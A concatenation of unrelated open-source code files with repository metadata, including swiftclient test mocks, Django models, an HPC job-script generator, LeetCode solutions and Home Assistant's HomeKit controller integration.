headers = {'content-length': str(len(self.body)),
'content-type': 'x-application/test',
'x-timestamp': self.timestamp,
'last-modified': self.timestamp,
'x-object-meta-test': 'testing',
'etag':
self.etag or '"%s"' % EMPTY_ETAG,
'x-works': 'yes',
'x-account-container-count': '12345'}
if not self.timestamp:
del headers['x-timestamp']
try:
if next(container_ts_iter) is False:
headers['x-container-timestamp'] = '1'
except StopIteration:
pass
if 'slow' in kwargs:
headers['content-length'] = '4'
if 'headers' in kwargs:
headers.update(kwargs['headers'])
if 'auth_v1' in kwargs:
headers.update(
{'x-storage-url': 'storageURL',
'x-auth-token': 'someauthtoken'})
return headers.items()
def read(self, amt=None):
if 'slow' in kwargs:
if self.sent < 4:
self.sent += 1
sleep(0.1)
return ' '
rv = self.body[:amt]
if amt is not None:
self.body = self.body[amt:]
else:
self.body = ''
return rv
def send(self, amt=None):
if 'slow' in kwargs:
if self.received < 4:
self.received += 1
sleep(0.1)
def getheader(self, name, default=None):
return dict(self.getheaders()).get(name.lower(), default)
def close(self):
self._closed = True
timestamps_iter = iter(kwargs.get('timestamps') or ['1'] * len(code_iter))
etag_iter = iter(kwargs.get('etags') or [None] * len(code_iter))
x = kwargs.get('missing_container', [False] * len(code_iter))
if not isinstance(x, (tuple, list)):
x = [x] * len(code_iter)
container_ts_iter = iter(x)
code_iter = iter(code_iter)
def connect(*args, **ckwargs):
if 'give_content_type' in kwargs:
if len(args) >= 7 and 'Content-Type' in args[6]:
kwargs['give_content_type'](args[6]['Content-Type'])
else:
kwargs['give_content_type']('')
if 'give_connect' in kwargs:
kwargs['give_connect'](*args, **ckwargs)
status = next(code_iter)
if isinstance(status, StubResponse):
fake_conn = FakeConn(status.status, body=status.body,
headers=status.headers)
else:
etag = next(etag_iter)
timestamp = next(timestamps_iter)
fake_conn = FakeConn(status, etag, body=kwargs.get('body', ''),
timestamp=timestamp)
if fake_conn.status <= 0:
raise RequestException()
return fake_conn
connect.code_iter = code_iter
return connect
class MockHttpTest(unittest.TestCase):
def setUp(self):
super(MockHttpTest, self).setUp()
self.fake_connect = None
self.request_log = []
# Capture output, since the test-runner stdout/stderr monkey-patching
# won't cover the references to sys.stdout/sys.stderr in
# swiftclient.multithreading
self.capture_output = CaptureOutput()
if 'SWIFTCLIENT_DEBUG' not in os.environ:
self.capture_output.__enter__()
self.addCleanup(self.capture_output.__exit__)
# since we're going to steal all stderr output globally; we should
# give the developer an escape hatch or risk scorn
def blowup_but_with_the_helpful(*args, **kwargs):
raise Exception(
"You tried to enter a debugger while stderr is "
"patched, you need to set SWIFTCLIENT_DEBUG=1 "
"and try again")
import pdb
pdb.set_trace = blowup_but_with_the_helpful
def fake_http_connection(*args, **kwargs):
self.validateMockedRequestsConsumed()
self.request_log = []
self.fake_connect = fake_http_connect(*args, **kwargs)
_orig_http_connection = c.http_connection
query_string = kwargs.get('query_string')
storage_url = kwargs.get('storage_url')
auth_token = kwargs.get('auth_token')
exc = kwargs.get('exc')
on_request = kwargs.get('on_request')
def wrapper(url, proxy=None, cacert=None, insecure=False,
cert=None, cert_key=None,
ssl_compression=True, timeout=None):
if storage_url:
self.assertEqual(storage_url, url)
parsed, _conn = _orig_http_connection(url, proxy=proxy)
class RequestsWrapper(object):
def close(self):
if hasattr(self, 'resp'):
self.resp.close()
conn = RequestsWrapper()
def request(method, path, *args, **kwargs):
try:
conn.resp = self.fake_connect()
except StopIteration:
self.fail('Unexpected %s request for %s' % (
method, path))
self.request_log.append((parsed, method, path, args,
kwargs, conn.resp))
conn.host = conn.resp.host
conn.resp.request = RequestsWrapper()
conn.resp.request.url = '%s://%s%s' % (
conn.resp.scheme, conn.resp.host, path)
conn.resp.has_been_read = False
_orig_read = conn.resp.read
def read(*args, **kwargs):
conn.resp.has_been_read = True
return _orig_read(*args, **kwargs)
conn.resp.read = read
if on_request:
status = on_request(method, path, *args, **kwargs)
conn.resp.status = status
if auth_token:
headers = args[1]
self.assertEqual(auth_token,
headers.get('X-Auth-Token'))
if query_string:
self.assertTrue(path.endswith('?' + query_string))
if path.endswith('invalid_cert') and not insecure:
from swiftclient import client as c
raise c.ClientException("invalid_certificate")
if exc:
raise exc
return conn.resp
def putrequest(path, data=None, headers=None, **kwargs):
request('PUT', path, data, headers, **kwargs)
conn.request = request
conn.putrequest = putrequest
def getresponse():
return conn.resp
conn.getresponse = getresponse
return parsed, conn
return wrapper
self.fake_http_connection = fake_http_connection
def iter_request_log(self):
for parsed, method, path, args, kwargs, resp in self.request_log:
parts = parsed._asdict()
parts['path'] = path
full_path = ParseResult(**parts).geturl()
args = list(args)
log = dict(zip(('body', 'headers'), args))
log.update({
'method': method,
'full_path': full_path,
'parsed_path': urlparse(full_path),
'path': path,
'headers': CaseInsensitiveDict(log.get('headers')),
'resp': resp,
'status': resp.status,
})
yield log
orig_assertEqual = unittest.TestCase.assertEqual
def assert_request_equal(self, expected, real_request):
method, path = expected[:2]
if urlparse(path).scheme:
match_path = real_request['full_path']
else:
match_path = real_request['path']
self.assertEqual((method, path), (real_request['method'],
match_path))
if len(expected) > 2:
body = expected[2]
real_request['expected'] = body
err_msg = 'Body mismatch for %(method)s %(path)s, ' \
'expected %(expected)r, and got %(body)r' % real_request
self.orig_assertEqual(body, real_request['body'], err_msg)
if len(expected) > 3:
headers = CaseInsensitiveDict(expected[3])
for key, value in headers.items():
real_request['key'] = key
real_request['expected_value'] = value
real_request['value'] = real_request['headers'].get(key)
err_msg = (
'Header mismatch on %(key)r, '
'expected %(expected_value)r and got %(value)r '
'for %(method)s %(path)s %(headers)r' % real_request)
self.orig_assertEqual(value, real_request['value'],
err_msg)
real_request['extra_headers'] = dict(
(key, value) for key, value in real_request['headers'].items()
if key not in headers)
if real_request['extra_headers']:
self.fail('Received unexpected headers for %(method)s '
'%(path)s, got %(extra_headers)r' % real_request)
def assertRequests(self, expected_requests):
"""
Make sure some requests were made like you expected, provide a list of
expected requests, typically in the form of [(method, path), ...]
or [(method, path, body, headers), ...]
"""
real_requests = self.iter_request_log()
for expected in expected_requests:
real_request = next(real_requests)
self.assert_request_equal(expected, real_request)
try:
real_request = next(real_requests)
except StopIteration:
pass
else:
self.fail('At least one extra request received: %r' %
real_request)
def assert_request(self, expected_request):
"""
Make sure a request was made as expected. Provide the
expected request in the form of [(method, path), ...]
"""
real_requests = self.iter_request_log()
for real_request in real_requests:
try:
self.assert_request_equal(expected_request, real_request)
break
except AssertionError:
pass
else:
raise AssertionError(
"Expected request %s not found in actual requests %s"
% (expected_request, self.request_log)
)
def validateMockedRequestsConsumed(self):
if not self.fake_connect:
return
unused_responses = list(self.fake_connect.code_iter)
if unused_responses:
self.fail('Unused responses %r' % (unused_responses,))
def tearDown(self):
self.validateMockedRequestsConsumed()
super(MockHttpTest, self).tearDown()
# TODO: this nuke from orbit clean up seems to be encouraging
# un-hygienic mocking on the swiftclient.client module; which may lead
# to some unfortunate test order dependency bugs by way of the broken
# window theory if any other modules are similarly patched
importlib.reload(c)
class CaptureStreamPrinter(object):
"""
CaptureStreamPrinter is used for testing unicode writing for PY3. Anything
written here is encoded as utf-8 and written to the parent CaptureStream
"""
def __init__(self, captured_stream):
self._captured_stream = captured_stream
def write(self, data):
# No encoding, just convert the raw bytes into a str for testing
# The below call also validates that we have a byte string.
self._captured_stream.write(
data if isinstance(data, bytes) else data.encode('utf8'))
class CaptureStream(object):
def __init__(self, stream):
self.stream = stream
self._buffer = io.BytesIO()
self._capture = CaptureStreamPrinter(self._buffer)
self.streams = [self._capture]
@property
def buffer(self):
return self._buffer
def flush(self):
pass
def write(self, *args, **kwargs):
for stream in self.streams:
stream.write(*args, **kwargs)
def writelines(self, *args, **kwargs):
for stream in self.streams:
stream.writelines(*args, **kwargs)
def getvalue(self):
return self._buffer.getvalue()
def clear(self):
self._buffer.truncate(0)
self._buffer.seek(0)
class CaptureOutput(object):
def __init__(self, suppress_systemexit=False):
self._out = CaptureStream(sys.stdout)
self._err = CaptureStream(sys.stderr)
self.patchers = []
WrappedOutputManager = functools.partial(s.OutputManager,
print_stream=self._out,
error_stream=self._err)
if suppress_systemexit:
self.patchers += [
mock.patch('swiftclient.shell.OutputManager.get_error_count',
return_value=0)
]
self.patchers += [
mock.patch('swiftclient.shell.OutputManager',
WrappedOutputManager),
mock.patch('sys.stdout', self._out),
mock.patch('sys.stderr', self._err),
]
def __enter__(self):
for patcher in self.patchers:
patcher.start()
return self
def __exit__(self, *args, **kwargs):
for patcher in self.patchers:
patcher.stop()
@property
def out(self):
return self._out.getvalue().decode('utf8')
@property
def err(self):
return self._err.getvalue().decode('utf8')
def clear(self):
self._out.clear()
self._err.clear()
# act like the string captured by stdout
def __str__(self):
return self.out
def __len__(self):
return len(self.out)
def __eq__(self, other):
return self.out == other
def __ne__(self, other):
return not self.__eq__(other)
def __getattr__(self, name):
return getattr(self.out, name)
class FakeKeystone(object):
'''
Fake keystone client module. Returns given endpoint url and auth token.
'''
def __init__(self, endpoint, token):
self.calls = []
self.auth_version = None
self.endpoint = endpoint
self.token = token
class _Client(object):
def __init__(self, endpoint, auth_token, **kwargs):
self.auth_token = auth_token
self.endpoint = endpoint
self.service_catalog = self.ServiceCatalog(endpoint)
class ServiceCatalog(object):
def __init__(self, endpoint):
self.calls = []
self.endpoint_url = endpoint
def url_for(self, **kwargs):
self.calls.append(kwargs)
return self.endpoint_url
def Client(self, **kwargs):
self.calls.append(kwargs)
self.client = self._Client(
endpoint=self.endpoint, auth_token=self.token, **kwargs)
return self.client
class Unauthorized(Exception):
pass
class AuthorizationFailure(Exception):
pass
class EndpointNotFound(Exception):
pass
class FakeStream(object):
def __init__(self, size):
self.bytes_read = 0
self.size = size
def read(self, size=-1):
if self.bytes_read == self.size:
return b''
if size == -1 or size + self.bytes_read > self.size:
remaining = self.size - self.bytes_read
self.bytes_read = self.size
return b'A' * remaining
self.bytes_read += size
return b'A' * size
def __len__(self):
return self.size
| {
"content_hash": "8c899b2e4b5a0205ff56422ead006fe0",
"timestamp": "",
"source": "github",
"line_count": 567,
"max_line_length": 78,
"avg_line_length": 35.91534391534392,
"alnum_prop": 0.5317226478098606,
"repo_name": "openstack/python-swiftclient",
"id": "87d32107843c6d8d1516e083a81f82b0ef2f764e",
"size": "20954",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/unit/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "905985"
},
{
"name": "Shell",
"bytes": "1862"
}
],
"symlink_target": ""
} |
from django.db import models
class Fruit(models.Model):
"""
A simple model of fruit
"""
name = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class FavoriteFruit(models.Model):
"""A simple model to test foreign keys to fruits"""
name = models.CharField(blank=True, max_length=100)
fruit = models.ForeignKey(Fruit)
def __unicode__(self):
return "%s likes %s" % (self.name, self.fruit)
class FruitCombo(models.Model):
"""A simple model to test many-to-many keys to fruits"""
name = models.CharField(blank=True, max_length=100)
fruit = models.ManyToManyField(Fruit)
def __unicode__(self):
return "%s combo" % self.name
| {
"content_hash": "e279114b9e1b88280fab454d59291d43",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 60,
"avg_line_length": 27.444444444444443,
"alnum_prop": 0.6342780026990553,
"repo_name": "callowayproject/django-selectablewrapper",
"id": "6551ca3d5142a9840127baee7ad7c2cb79852df3",
"size": "741",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example/simpleapp/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "498"
},
{
"name": "Python",
"bytes": "18196"
},
{
"name": "Shell",
"bytes": "3065"
}
],
"symlink_target": ""
} |
import subprocess
import sys
import os
import time
from subprocess import PIPE
import socket
import params
def extract_errors(output):
match_list = [
'DIAGNOSTICS ANALYTICAL RMS H:',
'DIAGNOSTICS ANALYTICAL RMS U:',
'DIAGNOSTICS ANALYTICAL RMS V:',
'DIAGNOSTICS ANALYTICAL MAXABS H:',
'DIAGNOSTICS ANALYTICAL MAXABS U:',
'DIAGNOSTICS ANALYTICAL MAXABS V:',
'Simulation time (seconds):'
]
vals = ["x" for i in range(len(match_list))]
ol = output.splitlines(True)
for o in ol:
o = o.replace('\n', '')
o = o.replace('\r', '')
for i in range(0, len(match_list)):
m = match_list[i]
if o[0:len(m)] == m:
vals[i] = o[len(m)+1:]
return vals
fftw_written = False
for i in params.tests:
id = i[0]
parameters = i[1]
title = i[2]
compile_c = i[3]
id_c = i[4]
for mpi_ranks in params.mpi_ranks:
for a in params.A_list:
for threads in params.thread_list:
for n in params.res_list:
# don't create mpi-parallelized jobs for non-mpi parallelized tests
if id[0:3] == 'nr_':
if mpi_ranks > 1:
continue
total_threads = mpi_ranks * threads
if total_threads > params.max_total_threads:
continue
compile_command = compile_c+" --numa-block-allocator="+str(a)+" "
# deactivate SWEET threading if geq 1 thread or REXI Parallel sum is enabled
no_threading = threads <= 1 or '--rexi-parallel-sum=enable' in compile_command
if no_threading:
compile_command += " --threading=off"
else:
compile_command += " --threading=omp"
file_id = id+"_t"+str(threads).zfill(3)+"_n"+str(n).zfill(4)+"_r"+str(mpi_ranks).zfill(4)+"_a"+str(a)
file_id_compile = id_c+"_t"+("no" if no_threading else "yes")+"_a"+str(a)
script_filename = params.curdir_name+"/run_"+file_id+".sh"
compile_script_filename = params.curdir_name+"/compile_"+file_id_compile+".sh"
output_filename = params.curdir_name+"/run_"+file_id+".txt"
output_filename_err = params.curdir_name+"/run_"+file_id+".err"
command = "./build/"+file_id_compile+" "
command += params.default_params
command += ' -C '+str(params.cfl)
command += ' -N '+str(n)
command += ' -U '+str(params.hyperviscosity[n])
command += parameters
"""
http://community.hartree.stfc.ac.uk/wiki/site/admin/idataplex%20phase-2%20-%20further%20info.html
84 nodes, each node has 2 x 12 core Intel Xeon processors, A total of 2,016 cores.
Interconnect is Infiniband from Mellanox (FDR Connect-IB 56 GB/s).
42 of 84 have accelerators - an Intel Phi 5110P.
http://community.hartree.stfc.ac.uk/wiki/site/admin/jobs2.html
Jobs will by default go into the q1h32 queue.
Hyperthreading is deactivated!
24 cores per node available
# run 24 MPI tasks per node
#BSUB -R "span[ptile=24]"
# phase2 system has 2x12 cores per node
# number of overall MPI tasks
#BSUB -n 128
"""
script_headers = """#BSUB -R "span[ptile="""+str(24/threads)+"""]"
#BSUB -R "affinity[core("""+str(threads)+"""):cpubind=core:distribute=pack]"
#BSUB -R same[type:model]
###BSUB -R order[hosts]
# All on the same rack - TODO: does this really work?
##BSUB -R "cu[type=rack]"
##BSUB -R "cu[maxcus=1]"
# dedicated network
###BSUB -network "type=sn_all: usage=dedicated"
###BSUB -network "type=sn_single: usage=dedicated"
# exclusive resource
#BSUB -x
#BSUB -q nxq
#BSUB -W """+params.timeout+"""
#BSUB -n """+str(mpi_ranks)+"""
#declare -x NUMA_BLOCK_ALLOC_VERBOSITY=1
declare -x KMP_AFFINITY="granularity=thread,compact,1,0"
declare -x OMP_NUM_THREADS="""+str(threads)+"""
"""
env_header = """
. /etc/profile.d/modules.sh
module unload gcc
# This FFTW does not support OMP!!!
module unload fftw
module load python/2.7.8
module load intel/15.2.164
module load intel_mpi
cd """+os.getcwd()+"""
cd ../../../
. local_software/env_vars.sh
"""
print("Creating compile script "+compile_script_filename)
fd = open(compile_script_filename, "w")
fd.write("#! /bin/bash\n\n"+env_header+"\n\n"+compile_command+" --program-binary-name="+file_id_compile+" || exit 1\n")
if not fftw_written:
for t in range(0, max(params.thread_list)+1):
fd = open("fftw_plan_"+str(t).zfill(3)+".sh", "w")
fd.write("""#BSUB -o fftw_plan_"""+str(t).zfill(3)+""".out
#BSUB -J fftw_plan_"""+str(t).zfill(3)+"""
"""+script_headers+"""
"""+env_header+"""
./fftw_gen_wisdoms_all.sh """+str(t)+"\n")
fftw_written = True
print("Creating script "+script_filename)
fd = open(script_filename, "w")
fd.write(
"""#BSUB -o """+output_filename+"""
#BSUB -e """+output_filename_err+"""
#BSUB -J """+file_id+"""
"""+script_headers+"""
echo "LSB_BIND_CPU_LIST"
echo "$LSB_BIND_CPU_LIST"
echo "LSB_BIND_MEM_LIST"
echo "$LSB_BIND_MEM_LIST"
echo "LSB_BIND_MEM_POLICY"
echo "$LSB_BIND_MEM_POLICY"
# RM_CPUTASKn"
echo "RM_MEM_AFFINITY"
echo "$RM_MEM_AFFINITY"
echo "OMP_NUM_THREADS"
echo "$OMP_NUM_THREADS"
echo
"""+env_header+"""
# force to use FFTW WISDOM data
declare -x SWEET_FFTW_LOAD_WISDOM_FROM_FILE="FFTW_WISDOM_T"""+("0" if no_threading else str(threads))+""""
mpiexec.hydra -genv OMP_NUM_THREADS """+str(threads)+""" -envall -np """+str(mpi_ranks)+""" """+command+"""
""")
| {
"content_hash": "b662393d1a6b7acbfc8881564a99b420",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 124,
"avg_line_length": 26.8265306122449,
"alnum_prop": 0.6356028908330164,
"repo_name": "schreiberx/sweet",
"id": "34ee9ba443748e2396791d847ea4f62b02867b5c",
"size": "5279",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "archive/benchmarks_plane/rexi_tests_stfc/test_nxq/create_jobs_scalability.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "133036"
},
{
"name": "C++",
"bytes": "2947985"
},
{
"name": "Fortran",
"bytes": "109460"
},
{
"name": "GLSL",
"bytes": "27428"
},
{
"name": "Makefile",
"bytes": "312"
},
{
"name": "Python",
"bytes": "2503502"
},
{
"name": "Shell",
"bytes": "490940"
},
{
"name": "TeX",
"bytes": "3093"
}
],
"symlink_target": ""
} |
from django.db import models
from django.utils import timezone
# from django.contrib.auth.models import User
# Create your models here.
class Activity(models.Model):
# user = models.ForeignKey(User)
full_description = models.CharField(max_length=255)
units = models.CharField(max_length=40)
class Meta:
default_related_name = 'activities'
def __str__(self):
return self.full_description
class Stat(models.Model):
activity = models.ForeignKey('Activity', related_name='stats')
reps = models.PositiveIntegerField()
date = models.DateField(default=timezone.now)
class Meta:
ordering = ['-date']
unique_together = ('activity', 'date')
def __str__(self):
return '{} {} at {}'.format(self.reps,
self.activity.units,
self.date)
| {
"content_hash": "21770577bdb0ffa6fa8baf1795f75928",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 66,
"avg_line_length": 26.757575757575758,
"alnum_prop": 0.6138165345413363,
"repo_name": "jal-stats/django",
"id": "ad3bfb98ea951eaa4baafea0378023f572075272",
"size": "883",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "jal_stats/stats/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14769"
}
],
"symlink_target": ""
} |
from google.analytics import admin_v1beta
def sample_get_property():
# Create a client
client = admin_v1beta.AnalyticsAdminServiceClient()
# Initialize request argument(s)
request = admin_v1beta.GetPropertyRequest(
name="name_value",
)
# Make the request
response = client.get_property(request=request)
# Handle the response
print(response)
# [END analyticsadmin_v1beta_generated_AnalyticsAdminService_GetProperty_sync]
| {
"content_hash": "7cf66fb01e6757f6ad05ecff2ff43794",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 78,
"avg_line_length": 24.736842105263158,
"alnum_prop": 0.7212765957446808,
"repo_name": "googleapis/python-analytics-admin",
"id": "ede4a2edfd6d4f42a8adaf903db3435a74db470e",
"size": "1872",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/analyticsadmin_v1beta_generated_analytics_admin_service_get_property_sync.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "5576405"
},
{
"name": "Shell",
"bytes": "30687"
}
],
"symlink_target": ""
} |
class Solution(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key=lambda (h, k): (-h, k))
blocks = [[]]
for p in people:
index = p[1]
for i, block in enumerate(blocks):
if index <= len(block):
break
index -= len(block)
block.insert(index, p)
if len(block) * len(block) > len(people):
blocks.insert(i+1, block[len(block)/2:])
del block[len(block)/2:]
return [p for block in blocks for p in block]
# Time: O(n^2)
# Space: O(n)
class Solution2(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key=lambda (h, k): (-h, k))
result = []
for p in people:
result.insert(p[1], p)
return result
| {
"content_hash": "eaf203bf826e5938ec66c92bc8827473",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 56,
"avg_line_length": 26.86842105263158,
"alnum_prop": 0.4730656219392752,
"repo_name": "githubutilities/LeetCode",
"id": "7863a79ff1bc9c69e872a684eff5f072477d6bfd",
"size": "1549",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "Python/queue-reconstruction-by-height.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "713028"
},
{
"name": "Go",
"bytes": "2824"
},
{
"name": "Java",
"bytes": "8367"
},
{
"name": "Python",
"bytes": "717555"
},
{
"name": "SQLPL",
"bytes": "822"
},
{
"name": "Shell",
"bytes": "3218"
}
],
"symlink_target": ""
} |
from unittest import TestCase
from kingpin import config_utils
class PathConversionTestCase(TestCase):
example_config_path = '/var/config/config.manageddata.spam.domain_hidelist'
example_zk_path = '/config/manageddata/spam/domain_hidelist'
def test_get_config_file_path(self):
self.assertEquals(
self.example_config_path,
config_utils.get_config_file_path(self.example_zk_path))
def test_get_zk_path(self):
self.assertEquals(
self.example_zk_path,
config_utils.get_zk_path(self.example_config_path))
| {
"content_hash": "7d7af3dde6cfe50972617634c1f44341",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 79,
"avg_line_length": 32.5,
"alnum_prop": 0.6871794871794872,
"repo_name": "pinterest/kingpin",
"id": "4110ae1c0c5c1801f2e9c7472eefce5fd7d56860",
"size": "1184",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kingpin/tests/config_utils/test_config_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "454238"
}
],
"symlink_target": ""
} |
"""Support for Homekit device discovery."""
from __future__ import annotations
import asyncio
from typing import Any
import aiohomekit
from aiohomekit.model import Accessory
from aiohomekit.model.characteristics import (
Characteristic,
CharacteristicPermissions,
CharacteristicsTypes,
)
from aiohomekit.model.services import Service, ServicesTypes
from homeassistant.components import zeroconf
from homeassistant.const import ATTR_VIA_DEVICE, EVENT_HOMEASSISTANT_STOP
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.entity import DeviceInfo, Entity
from .config_flow import normalize_hkid
from .connection import HKDevice, valid_serial_number
from .const import (
CONTROLLER,
DOMAIN,
ENTITY_MAP,
IDENTIFIER_ACCESSORY_ID,
IDENTIFIER_SERIAL_NUMBER,
KNOWN_DEVICES,
TRIGGERS,
)
from .storage import EntityMapStorage
def escape_characteristic_name(char_name):
"""Escape any dash or dots in a characteristics name."""
return char_name.replace("-", "_").replace(".", "_")
class HomeKitEntity(Entity):
"""Representation of a Home Assistant HomeKit device."""
_attr_should_poll = False
def __init__(self, accessory, devinfo):
"""Initialise a generic HomeKit device."""
self._accessory = accessory
self._aid = devinfo["aid"]
self._iid = devinfo["iid"]
self._features = 0
self.setup()
self._signals = []
super().__init__()
@property
def accessory(self) -> Accessory:
"""Return an Accessory model that this entity is attached to."""
return self._accessory.entity_map.aid(self._aid)
@property
def accessory_info(self) -> Service:
"""Information about the make and model of an accessory."""
return self.accessory.services.first(
service_type=ServicesTypes.ACCESSORY_INFORMATION
)
@property
def service(self) -> Service:
"""Return a Service model that this entity is attached to."""
return self.accessory.services.iid(self._iid)
async def async_added_to_hass(self):
"""Entity added to hass."""
self._signals.append(
self.hass.helpers.dispatcher.async_dispatcher_connect(
self._accessory.signal_state_updated, self.async_write_ha_state
)
)
self._accessory.add_pollable_characteristics(self.pollable_characteristics)
self._accessory.add_watchable_characteristics(self.watchable_characteristics)
async def async_will_remove_from_hass(self):
"""Prepare to be removed from hass."""
self._accessory.remove_pollable_characteristics(self._aid)
self._accessory.remove_watchable_characteristics(self._aid)
for signal_remove in self._signals:
signal_remove()
self._signals.clear()
async def async_put_characteristics(self, characteristics: dict[str, Any]):
"""
Write characteristics to the device.
A characteristic type is unique within a service, but in order to write
to a named characteristic on a bridge we need to turn its type into
an aid and iid, and send it as a list of tuples, which is what this
helper does.
E.g. you can do:
await entity.async_put_characteristics({
CharacteristicsTypes.ON: True
})
"""
payload = self.service.build_update(characteristics)
return await self._accessory.put_characteristics(payload)
def setup(self):
"""Configure an entity baed on its HomeKit characteristics metadata."""
self.pollable_characteristics = []
self.watchable_characteristics = []
char_types = self.get_characteristic_types()
# Setup events and/or polling for characteristics directly attached to this entity
for char in self.service.characteristics.filter(char_types=char_types):
self._setup_characteristic(char)
# Setup events and/or polling for characteristics attached to sub-services of this
# entity (like an INPUT_SOURCE).
for service in self.accessory.services.filter(parent_service=self.service):
for char in service.characteristics.filter(char_types=char_types):
self._setup_characteristic(char)
def _setup_characteristic(self, char: Characteristic):
"""Configure an entity based on a HomeKit characteristics metadata."""
# Build up a list of (aid, iid) tuples to poll on update()
if CharacteristicPermissions.paired_read in char.perms:
self.pollable_characteristics.append((self._aid, char.iid))
# Build up a list of (aid, iid) tuples to subscribe to
if CharacteristicPermissions.events in char.perms:
self.watchable_characteristics.append((self._aid, char.iid))
@property
def unique_id(self) -> str:
"""Return the ID of this device."""
info = self.accessory_info
serial = info.value(CharacteristicsTypes.SERIAL_NUMBER)
if valid_serial_number(serial):
return f"homekit-{serial}-{self._iid}"
# Some accessories do not have a serial number
return f"homekit-{self._accessory.unique_id}-{self._aid}-{self._iid}"
@property
def name(self) -> str:
"""Return the name of the device if any."""
return self.accessory_info.value(CharacteristicsTypes.NAME)
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._accessory.available and self.service.available
@property
def device_info(self) -> DeviceInfo:
"""Return the device info."""
info = self.accessory_info
accessory_serial = info.value(CharacteristicsTypes.SERIAL_NUMBER)
if valid_serial_number(accessory_serial):
# Some accessories do not have a serial number
identifier = (DOMAIN, IDENTIFIER_SERIAL_NUMBER, accessory_serial)
else:
identifier = (
DOMAIN,
IDENTIFIER_ACCESSORY_ID,
f"{self._accessory.unique_id}_{self._aid}",
)
device_info = DeviceInfo(
identifiers={identifier},
manufacturer=info.value(CharacteristicsTypes.MANUFACTURER, ""),
model=info.value(CharacteristicsTypes.MODEL, ""),
name=info.value(CharacteristicsTypes.NAME),
sw_version=info.value(CharacteristicsTypes.FIRMWARE_REVISION, ""),
)
# Some devices only have a single accessory - we don't add a
# via_device otherwise it would be self referential.
bridge_serial = self._accessory.connection_info["serial-number"]
if accessory_serial != bridge_serial:
device_info[ATTR_VIA_DEVICE] = (
DOMAIN,
IDENTIFIER_SERIAL_NUMBER,
bridge_serial,
)
return device_info
def get_characteristic_types(self):
"""Define the homekit characteristics the entity cares about."""
raise NotImplementedError
class AccessoryEntity(HomeKitEntity):
"""A HomeKit entity that is related to an entire accessory rather than a specific service or characteristic."""
@property
def unique_id(self) -> str:
"""Return the ID of this device."""
serial = self.accessory_info.value(CharacteristicsTypes.SERIAL_NUMBER)
return f"homekit-{serial}-aid:{self._aid}"
class CharacteristicEntity(HomeKitEntity):
"""
A HomeKit entity that is related to an single characteristic rather than a whole service.
This is typically used to expose additional sensor, binary_sensor or number entities that don't belong with
the service entity.
"""
def __init__(self, accessory, devinfo, char):
"""Initialise a generic single characteristic HomeKit entity."""
self._char = char
super().__init__(accessory, devinfo)
@property
def unique_id(self) -> str:
"""Return the ID of this device."""
serial = self.accessory_info.value(CharacteristicsTypes.SERIAL_NUMBER)
return f"homekit-{serial}-aid:{self._aid}-sid:{self._char.service.iid}-cid:{self._char.iid}"
async def async_setup_entry(hass, entry):
"""Set up a HomeKit connection on a config entry."""
conn = HKDevice(hass, entry, entry.data)
hass.data[KNOWN_DEVICES][conn.unique_id] = conn
# For backwards compat
if entry.unique_id is None:
hass.config_entries.async_update_entry(
entry, unique_id=normalize_hkid(conn.unique_id)
)
if not await conn.async_setup():
del hass.data[KNOWN_DEVICES][conn.unique_id]
raise ConfigEntryNotReady
return True
async def async_setup(hass, config):
"""Set up for Homekit devices."""
map_storage = hass.data[ENTITY_MAP] = EntityMapStorage(hass)
await map_storage.async_initialize()
async_zeroconf_instance = await zeroconf.async_get_async_instance(hass)
hass.data[CONTROLLER] = aiohomekit.Controller(
async_zeroconf_instance=async_zeroconf_instance
)
hass.data[KNOWN_DEVICES] = {}
hass.data[TRIGGERS] = {}
async def _async_stop_homekit_controller(event):
await asyncio.gather(
*(
connection.async_unload()
for connection in hass.data[KNOWN_DEVICES].values()
)
)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, _async_stop_homekit_controller)
return True
async def async_unload_entry(hass, entry):
"""Disconnect from HomeKit devices before unloading entry."""
hkid = entry.data["AccessoryPairingID"]
if hkid in hass.data[KNOWN_DEVICES]:
connection = hass.data[KNOWN_DEVICES][hkid]
await connection.async_unload()
return True
async def async_remove_entry(hass, entry):
"""Cleanup caches before removing config entry."""
hkid = entry.data["AccessoryPairingID"]
hass.data[ENTITY_MAP].async_delete_map(hkid)
| {
"content_hash": "777e920a6aec625aff4161bfe1155971",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 115,
"avg_line_length": 35.17482517482517,
"alnum_prop": 0.6577534791252485,
"repo_name": "jawilson/home-assistant",
"id": "f91355906dceaf5dc35aff79a2892131fa6820ba",
"size": "10060",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "homeassistant/components/homekit_controller/__init__.py",
"mode": "33188",
"license": "apache-2.0",
